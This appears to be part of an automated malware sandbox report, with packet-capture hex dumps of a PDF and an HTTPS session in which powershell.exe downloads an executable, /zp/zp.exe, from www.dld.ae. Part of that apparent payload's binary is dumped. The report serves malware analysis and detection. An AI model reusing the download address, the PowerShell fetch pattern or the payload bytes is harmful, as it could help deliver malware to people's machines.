                                                                    Data Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35 33 32 3e 5d 2f 49 6e 64 65 78 5b 31 32 39 20 33 38 5d 2f 49 6e 66 6f 20 31 32 38 20 30 20 52 2f 4c 65 6e 67 74 68 20 38 39 2f 50 72 65 76 20 36 35 32 37 37 31 2f 52 6f 6f 74 20 31 33 30 20 30 20 52 2f 53 69 7a 65 20 31 36 37 2f 54 79 70 65 2f 58 52 65 66 2f 57 5b 31 20 33 20 31 5d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 62 62 64 60 10 60 60 62 60 60 fe 04 22 19 3a 40 24 53 19 58 c4 06 44 1a 1d 05 8b 27 82 c8 6e 03 b0 6c 1b 88 64 ac 00 8b c7 02 49 46 77 66 b0 78 2d 88 d4 bb 02 24 ff 1f 34 66 60 02 9a 2c 08 56 c3 c0 38 00 e4 7f 06 c6 9c 37 40 f2 3f 3f 03 40 80 01 00 c4 3a 0e 4d 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 73 74 61 72 74 78 72 65 66 0d 0a 30 0d 0a 25 25 45 4f 46 0d 0a 20 20 20 20 20 20 20 0d 0a 31 36 35 20 30 20 6f 62 6a 0d 3c 3c 2f 43 20 31 38 30 2f 45 20 31 36 34 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 20 32 30 32 2f 4c 65 6e 67 74 68 20 31 36 37 2f 4f 20 31 32 36 2f 53 20 37 34 2f 56 20 31 34 32 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 62 60 60 60 61 60 60 aa 64 60 65 60 48 88 67 10 62 40 00 21 06 66 a0 1c 0b 03 87 8b 03 0b 83 75 76 03 03 67 e0 d2 75 8b 0e 28 3b a4 70 30 f0 1c 32 91 68 e4 e8 40 16 05 ea d0 62 e0 bc b6 1a 48 f3 00 31 2f d8 8c 58 06 01 46 49 a6 fb 86 19 0c 2c 5d 97 19 35 19 a5 19 18 dc 96 31 2a e8 96 0b fe 64 d2 06 ab d0 66 e0 bc 69 0c a4 19 81 a8 12 48 eb 30 70 de 5a 03 e1 33 dd 85 bb 45 9f 81 f3 c9 2f 88 28 43 21 10 eb 32 70 de ed 04 d2 4c 0c 0c ec 85 70 55 46 0c 9c 5f be 43 55 bd 01 08 30 00 be 98 22 2e 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 33 30 20 30 20 6f 62 6a 0d 3c 3c 2f 41 63 72 6f 46 6f 72 6d 20 31 34 34 20 30 20 52 2f 4d 65 74 61 64 61 74 61 20 34 38 20 30 20 52 2f 4e 61 6d 65 73 20 31 34 35 20 30 20 52 2f 4f 75 74 6c 69 6e 65 73 20 31 30 33 20 30 20 52 2f 50 61 67 65 73 20 31 32 37 20 30 20 52 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 31 37 20 30 20 52 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 3e 3e 0d 65 6e 64 6f 62 6a 0d 31 33 31 20 30 20 6f 62 6a 0d 3c 3c 2f 43 6f 6e 74 65 6e 74 73 20 31 33 32 20 30 20 52 2f 43 72 6f 70 42 6f 78 5b 30 20 30 20 35 39 35 2e 34 34 20 38 34 31 2e 36 38 5d 2f 47 72 6f 75 70 3c 3c 2f 43 53 2f 44 65 76 69 63 65 52 47 42 2f 53 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 2f 54 79 70 65 2f 47 72 6f 75 70 3e 3e 2f 4d 65 64 69 61 42 6f 78 5b 30 20 30 20 35 39 35 2e 34 34 20 38 34 31
                                                                    Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>streamhbbd```b``":@$SXD'nldIFwfx-$4f`,V87@??@:Mendstreamendobjstartxref0%%EOF 165 0 obj<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>streamhb```a``d`e`Hgb@!fuvgu(;p02h@bH1/XFI,]51*dfiH0pZ3E/(C!2pLpUF_CU0".endstreamendobj130 0 obj<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>endobj131 0 obj<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/Type/Group>>/MediaBox[0 0 595.44 841
                                                                    Jun 1, 2023 12:14:22.948837996 CEST544INData Raw: 2e 36 38 5d 2f 50 61 72 65 6e 74 20 31 32 37 20 30 20 52 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 45 78 74 47 53 74 61 74 65 3c 3c 2f 47 53 30 20 31 34 36 20 30 20 52 3e 3e 2f 46 6f 6e 74 3c 3c 2f 43 32 5f 30 20 31 35 31 20 30 20 52 2f 43 32 5f 31
                                                                    Data Ascii: .68]/Parent 127 0 R/Resources<</ExtGState<</GS0 146 0 R>>/Font<</C2_0 151 0 R/C2_1 153 0 R/C2_2 158 0 R/TT0 161 0 R/TT1 164 0 R>>/ProcSet[/PDF/Text/ImageC]/XObject<</Im0 141 0 R/Im1 142 0 R>>>>/Rotate 0/StructParents 0/Tabs/S/Type/Page>>endob
                                                                    Jun 1, 2023 12:14:22.948864937 CEST545INData Raw: 4e 5a c8 f5 22 96 52 50 da 90 e3 bb 5d 72 b5 4b ed e2 2e 62 75 a8 57 bc e4 52 97 2f 95 20 b9 12 9a e4 a2 e4 5a 44 2e 5d c4 e6 e4 fe ab af 36 4f 1f 7f b1 f9 76 77 fd 3f 32 96 97 ff 92 bf b7 17 5f 6e 9e fe 20 05 7f bc 79 7d fb e6 ea e6 ad 64 ff fa
                                                                    Data Ascii: NZ"RP]rK.buWR/ ZD.]6Ovw?2_n y}dHzf/|{^>QnVA)kA|o^_?_7/y?_wrfw'jvo>~w_n^_8kxO_$
                                                                    Jun 1, 2023 12:14:22.948890924 CEST547INData Raw: 98 e3 7b 45 e8 55 49 51 58 fe 21 85 28 f5 64 55 9a b0 b2 d1 be 7e 23 ea 37 64 15 f9 de 22 b1 af 23 ad fb dc 2a 26 42 fb db 8e fb 8b be ce fd 1c 7d 3c d1 3f f6 43 da c5 7b a8 83 b3 30 cf 9c 2c 1a 13 16 40 16 22 b8 7a 6f 76 b3 28 64 9f 9a 22 37 41
                                                                    Data Ascii: {EUIQX!(dU~#7d"#*&B}<?C{0,@"zov(d"7Ai{fXeN>]}|%CZl1qKIj"uP1r|(4[T|8qM101Kc`9ZW}`b5ETkD A+>6wKo
                                                                    Jun 1, 2023 12:14:22.948914051 CEST548INData Raw: 7c ea fb a7 ae 63 4d 96 38 12 15 26 db 47 d3 ec 40 86 39 f4 44 82 13 f9 54 aa c4 0a c1 84 d6 8e d2 39 3c 53 0b 8e 89 c0 b2 07 ff 96 52 dd a9 44 75 1c bc 05 ba ce a9 f4 e0 d7 2b 93 77 d4 63 30 df c2 1d 90 28 00 7f 24 61 2e 7a 41 bf 41 19 8c 85 7d
                                                                    Data Ascii: |cM8&G@9DT9<SRDu+wc0($a.zAA}4I=hJ(z6m}FL~dIu,`hF:Wc$gh8OO>UjGA=03^mh!)f#i%^N*CjK6&w*%d
                                                                    Jun 1, 2023 12:14:22.948937893 CEST549INData Raw: 46 98 0c 20 2f 3d cf e6 0f 88 3e 8c cb 1e 86 8c d9 4a 8d 08 71 4f f9 03 1d 16 9d 8d 7b eb 48 79 1c 7b 62 99 ba bb ff ec 63 e9 14 50 af 1a 88 cf a9 da 8c a4 71 1b 89 89 d2 8a d7 7d f8 b1 34 c2 18 08 f2 58 e4 cf 2a 76 2b 00 d7 39 e8 f4 39 a8 f4 d9
                                                                    Data Ascii: F /=>JqO{Hy{bcPq}4X*v+99Q,3*on bby( &)9l,"/Gf9Awfx8w3l}@/9`LJvU*42TH3t2uPP'E`tayk~14[{a:Od
                                                                    Jun 1, 2023 12:14:22.948962927 CEST551INData Raw: d9 5a 26 e9 5a ea 5b 9f f2 54 d5 b3 20 79 d4 e9 64 02 42 9f 26 0d 68 2f 64 e1 20 b4 0c 48 27 e6 57 63 00 22 a1 1b 3a 31 b0 90 fa a2 8b e6 4b 9c e6 39 4f 83 f1 d0 0a b4 85 e8 ea ab f6 cf 0b 2b f7 d5 fc d2 35 a1 1f b2 a1 ca 04 86 a0 30 73 a9 db 94
                                                                    Data Ascii: Z&Z[T ydB&h/d H'Wc":1K9O+50sxjhA|c~OM',/bnB_ D0qNR8\UE9E^}zAox>;1lc/E##,wMrqRb{57/O#|?Nx#:"Qsxm
                                                                    Jun 1, 2023 12:14:22.948987961 CEST552INData Raw: 5d e4 44 49 b2 f5 43 4f 45 41 72 34 26 17 0d 58 75 b2 dd c7 56 1d 5b 44 b8 02 4a 7c b0 16 20 19 22 04 11 df b2 be ae ae 5b 93 de c0 7f 80 09 74 0c 7f 0e d0 c4 e5 02 3e 13 ea 28 a1 31 b6 b3 84 16 e4 e8 ad 04 9a 98 23 4a 85 c1 1e f4 2e 59 09 ac 45
                                                                    Data Ascii: ]DICOEAr4&XuV[DJ| "[t>(1#J.YEl>$GZ!8.=8d+JK(iR1CHRyS1_05YNwkOr1LgRp(AHB]9TJM"U"~qT
                                                                    Jun 1, 2023 12:14:22.949017048 CEST553INData Raw: 2e b7 ae c8 00 8f c8 4a f9 1b b3 0d 5f 51 55 7b 22 91 da ad cc 51 18 1a 61 63 c7 17 36 0a df 9d 9d 2d 58 29 a8 26 76 cc 2b 9c 47 0c a1 05 ae 06 0a 03 82 c4 00 db 85 db 30 12 b1 27 0d c0 db 07 ab 04 85 d0 1e 84 a4 f7 84 c7 70 6c 05 e0 75 01 6d 82
                                                                    Data Ascii: .J_QU{"Qac6-X)&v+G0'plum.XURY%\.CgxS2'3" Qd2LrC8_#:bhn5,,d00~c=y<6'??-X2+qat+L@l8=I'iwy<q
                                                                    Jun 1, 2023 12:14:22.949047089 CEST555INData Raw: 2d 58 8b 25 d3 a6 94 33 1e cb cc 41 8f 42 03 92 f1 13 4c a5 09 8c 5c b6 21 5c 04 b0 16 47 f4 04 ef 02 f7 13 35 fe 0a f8 a7 84 6b ee f6 1c 81 72 68 12 a7 0a 2a 13 ad fb 5d d4 e6 48 f8 40 07 9a 0d 30 36 e0 2b 3b 33 11 7f 49 63 38 e1 e5 0d 70 f3 c2
                                                                    Data Ascii: -X%3ABL\!\G5krh*]H@06+;3Ic8p!V X(hFFP6gC5W#6j@NP$RXYa9BWy>@-6NVtZ180 sjzxS4t<F2a:Z$M5&
                                                                    Jun 1, 2023 12:14:23.116688013 CEST556INData Raw: 37 57 fe 55 1b 38 c8 06 71 4b e0 39 24 1b 0c 40 52 49 1f 15 9a 3a e7 24 23 aa 11 e0 e6 00 13 e3 b3 63 3f d0 ab 1b 0e fb 01 8e b3 32 b6 55 67 17 c6 5e c0 54 16 1a 54 b3 6e 77 ec 01 80 8c 9b a7 cd 94 4e d4 aa 70 ec d1 e6 d8 5b dc 47 a8 07 3d b9 d9
                                                                    Data Ascii: 7WU8qK9$@RI:$#c?2Ug^TTnwNp[G=~YOyb7fE+5IT$0D_%AJu'>q/nNLa!0q#@w4aSDA"/|KF8lJL


                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.64969384.16.234.51443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2023-06-01 10:14:19 UTC0OUTGET /zp/zp.exe HTTP/1.1
                                                                    Host: www.dld.ae
                                                                    Connection: Keep-Alive
                                                                    2023-06-01 10:14:19 UTC0INHTTP/1.1 200 OK
                                                                    Date: Thu, 01 Jun 2023 10:14:19 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Last-Modified: Sun, 28 May 2023 22:20:31 GMT
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 535909
                                                                    Content-Type: application/x-msdownload
                                                                    2023-06-01 10:14:19 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 70 85 3a 75 11 eb 69 75 11 eb 69 75 11 eb 69 b6 1e b4 69 77 11 eb 69 75 11 ea 69 eb 11 eb 69 b6 1e b6 69 64 11 eb 69 21 32 db 69 7f 11 eb 69 b2 17 ed 69 74 11 eb 69 52 69 63 68 75 11 eb 69 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 98 d7 6f 53 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 cc 01 00 00 04 00 00 17 32 00 00 00 10 00 00 00 70 00 00 00 00 40
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1p:uiuiuiiwiuiiidi!2iiitiRichuiPELoS\2p@
                                                                    2023-06-01 10:14:19 UTC8INData Raw: 55 8b ec 8d 45 08 50 a1 90 37 42 00 0b 45 08 50 6a 00 6a 22 e8 dd fe ff ff 50 a1 b0 a7 40 00 ff 70 04 e8 c4 ff ff ff 50 ff 15 04 70 40 00 f7 d8 1b c0 f7 d0 23 45 08 5d c2 04 00 55 8b ec 83 ec 40 81 7d 0c 10 01 00 00 75 19 6a 00 68 fa 00 00 00 6a 01 ff 75 08 ff 15 30 72 40 00 c7 45 0c 13 01 00 00 81 7d 0c 13 01 00 00 75 45 e8 46 00 00 00 83 3d f0 36 42 00 00 b9 3c 90 40 00 75 05 b9 20 90 40 00 50 8d 45 c0 51 50 ff 15 38 72 40 00 83 c4 0c 8d 45 c0 50 ff 75 08 ff 15 6c 72 40 00 8d 45 c0 50 68 06 04 00 00 ff 75 08 e8 18 29 00 00 33 c0 c9 c2 10 00 8b 0d 88 68 41 00 a1 98 e8 41 00 3b c8 7c 02 8b c8 50 6a 64 51 ff 15 48 71 40 00 c3 55 8b ec 83 ec 40 56 33 f6 39 75 08 74 18 a1 94 68 41 00 3b c6 74 07 50 ff 15 28 72 40 00 89 35 94 68 41 00 eb 76 39 35 94 68 41 00
                                                                    Data Ascii: UEP7BEPjj"P@pPp@#E]U@}ujhju0r@E}uEF=6B<@u @PEQP8r@EPulr@EPhu)3hAA;|PjdQHq@U@V39uthA;tP(r@5hAv95hA
                                                                    2023-06-01 10:14:19 UTC15INData Raw: 8b 04 b8 3b c3 74 27 83 ff 20 74 03 89 5d f4 50 53 e8 a3 12 00 00 50 53 68 43 01 00 00 ff 75 f8 ff d6 57 50 68 51 01 00 00 ff 75 f8 ff d6 47 83 ff 21 7c c9 8b 7d 14 8b 5d f4 ff 74 9f 30 6a 15 ff 75 08 e8 3d f5 ff ff ff 74 9f 34 6a 16 ff 75 08 e8 2f f5 ff ff 33 ff 33 db 39 3d 0c 37 42 00 0f 8e c4 00 00 00 8b 45 f0 8d 50 08 89 55 e8 8d 42 10 80 38 00 0f 84 90 00 00 00 89 45 c8 8b 02 6a 20 8b d0 59 89 5d b0 23 d1 c7 45 b4 02 00 ff ff a8 02 c7 45 b8 0d 00 00 00 89 4d c4 89 7d dc 89 55 c0 74 38 8d 45 b0 c7 45 b8 4d 00 00 00 50 6a 00 68 00 11 00 00 c7 45 d8 01 00 00 00 ff 75 fc ff d6 8b 0d d8 fc 41 00 c7 45 e4 01 00 00 00 89 04 b9 a1 d8 fc 41 00 8b 1c b8 eb 2e a8 04 74 11 53 6a 03 68 0a 11 00 00 ff 75 fc ff d6 8b d8 eb 19 8d 45 b0 50 6a 00 68 00 11 00 00 ff 75
                                                                    Data Ascii: ;t' t]PSPShCuWPhQuG!|}]t0ju=t4ju/339=7BEPUB8Ej Y]#EEM}Ut8EEMPjhEuAEA.tSjhuEPjhu
                                                                    2023-06-01 10:14:19 UTC23INData Raw: f0 08 0f b6 09 ff 4d 94 c1 e0 08 0b c1 ff 45 90 89 45 f4 8b 85 7c ff ff ff 89 85 78 ff ff ff e9 91 f7 ff ff 83 7d c0 00 75 1c 8b 45 b4 8b 4d a8 c1 e0 04 c7 45 d0 08 00 00 00 8d 84 01 04 01 00 00 e9 38 ff ff ff 81 45 a8 04 02 00 00 c7 45 d0 10 00 00 00 c7 45 c0 08 00 00 00 c7 45 84 14 00 00 00 8b 45 c0 c7 45 b0 01 00 00 00 89 45 b8 eb 28 83 7d 94 00 0f 84 32 01 00 00 8b 4d 90 8b 45 f4 c1 65 f0 08 0f b6 09 ff 4d 94 c1 e0 08 0b c1 ff 45 90 89 45 f4 ff 4d b8 83 7d b8 00 7e 5e 8b 45 b0 8b 4d f0 c1 e9 0b 8d 14 00 8b 45 a8 8d 34 02 89 75 ac 66 8b 06 0f b7 f8 0f af cf 39 4d f4 73 17 89 4d f0 b9 00 08 00 00 2b cf c1 f9 05 03 c8 d1 65 b0 66 89 0e eb 16 29 4d f0 29 4d f4 66 8b c8 66 c1 e9 05 2b c1 42 66 89 06 89 55 b0 81 7d f0 00 00 00 01 73 9e e9 74 ff ff ff 8b 4d
                                                                    Data Ascii: MEE|x}uEME8EEEEEEE(}2MEeMEEM}~^EME4uf9MsM+ef)M)Mff+BfU}stM
                                                                    2023-06-01 10:14:19 UTC31INData Raw: 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    2023-06-01 10:14:19 UTC39INData Raw: b0 a4 a4 a4 b0 9e a4 a4 b0 a4 a4 a4 9e a4 a4 a4 b0 a4 a4 a4 b0 a4 a4 a4 b0 a4 a4 a4 b0 a4 a4 a4 b0 a4 a4 a4 b0 a4 a4 a4 b0 a4 a4 a4 b0 a4 a4 a4 b0 a4 a4 a4 b0 a4 a4 9e b0 a4 a4 a4 b0 a4 a4 a4 af a4 a4 a4 af a4 a4 a4 ae a4 a4 a4 ac a4 a4 a4 a9 a4 a4 a4 a6 a4 a4 a4 a2 a4 a4 a4 9e 9e a4 a4 9a a4 a4 a4 96 a4 a4 a4 94 a4 a4 a4 92 a4 a4 a4 91 a4 a4 a4 90 a4 a4 a4 90 a4 a4 a4 90 a4 a4 a4 90 a4 a4 a4 90 a4 a4 a4 90 a4 a4 a4 90 a4 a4 a4 90 a4 a4 a4 8f a4 a4 a4 8e a4 a4 a4 8c a4 a4 a4 89 a4 a4 a4 85 a4 a4 a4 81 a4 a4 a4 7d a4 a4 a4 79 a4 a4 a4 75 a4 a4 a4 72 a4 a4 a4 70 a4 a4 9e 6f a4 a4 a4 6e a4 a4 a4 6e a4 a4 a4 6c a4 a4 a4 6a a4 a4 a4 68 a4 a4 a4 64 a4 a4 a4 60 a4 a4 a4 5c a4 a4 a4 58 a4 a4 a4 54 a4 a4 a4 51 a4 a4 a4 4f a4 a4 a4 4c a4 a4 a4 49 a4 a4 a4 46 a4 a4
                                                                    Data Ascii: }yurponnljhd`\XTQOLIF
                                                                    2023-06-01 10:14:19 UTC47INData Raw: f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 9e a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 9e a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f8 a4 a4 a4 f7 a4 a4 a4 f7 a4 a4 a4 f7 a4 a4 a4 f7 a4 a4 a4 f6 a4 a4 a4 f6 a4 9e a4 f5 a4 a4 a4 f4 a4 a4 a4 f3 a4 a4 a4 f2 a4 a4 a4 f1 a4 a4 a4 f0 a4 a4 a4 ef a4 a4 a4 ef a4 a4 a4 ef a4 a4 a4 ef a4 a4 a4 ef a4 a4 9e ef a4 a4 a4 ef a4 a4
                                                                    Data Ascii:
                                                                    2023-06-01 10:14:19 UTC54INData Raw: ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 9e ff 9e 60 ce ff 19 9e ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 9e ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 9e 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce 9e 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 19 60 ce ff 9e 60 ce ff 19 60 ce ff 19 60 ce ff 19 9e ce ff 19 60
                                                                    Data Ascii: ``````````````````````````````````````````````````````````````
                                                                    2023-06-01 10:14:19 UTC62INData Raw: ff 19 62 cf ff 9e 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 9e 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 9e cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 9e ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf 9e 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62 cf ff 19 62
                                                                    Data Ascii: bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
                                                                    2023-06-01 10:14:19 UTC70INData Raw: ff 18 63 d0 cf 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 63 d0 0f 18 63 d0 ff 18 63 9e ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 9e 63 d0 ff 18 63 9e ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63
                                                                    Data Ascii: cccccccccccccccccccccccccccccccc
                                                                    2023-06-01 10:14:19 UTC78INData Raw: ff 17 64 cf ff 17 64 cf ff 17 64 cf ff 17 65 d0 ff 17 65 d0 ff 17 65 d0 ff 17 65 d0 ff 17 65 d0 ff 17 65 d0 ff 17 65 d0 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 9e d1 ff 17 65 9e ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 9e 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 17 65 d1 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: dddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
                                                                    2023-06-01 10:14:19 UTC86INData Raw: ff 14 5a b5 ff 14 5a b6 ff 14 5b b7 ff 14 5c b9 ff 14 5c bb ff 14 5d bc 9e 14 5e be ff 15 5f c1 ff 15 9e c3 ff 15 61 c5 ff 15 61 c7 ff 15 63 ca ff 15 63 cb ff 16 64 cd ff 16 64 ce ff 9e 65 d0 ff 16 65 d0 ff 16 65 d0 ff 16 66 d1 ff 16 9e d1 ff 16 66 d2 ff 16 66 d2 ff 16 66 d2 ff 16 66 d2 9e 16 66 d2 ff 16 66 d2 ff 16 66 d1 ff 16 66 d1 ff 16 65 d0 ff 16 65 d0 ff 16 65 d0 ff 16 64 ce ff 16 64 cd ff 15 63 cb ff 15 62 ca 9e 15 62 c8 ff 15 61 c5 ff 15 60 c4 ff 15 5f c1 ff 15 5f c0 ff 14 5e be ff 14 5d bc ff 14 5d bb ff 14 5c ba ff 14 5c b9 ff 14 5b b8 ff 14 5b b8 ff 14 5b b8 ff 14 5c b9 ff 9e 5c b9 ff 14 5c ba ff 14 5d bc ff 14 5d bd ff 14 5e be ff 15 5f c1 ff 15 60 c2 ff 15 60 c4 ff 15 61 c5 ff 15 62 c8 ff 15 62 ca ff 15 63 cb ff 16 64 cd ff 16 65 cf ff 16 65
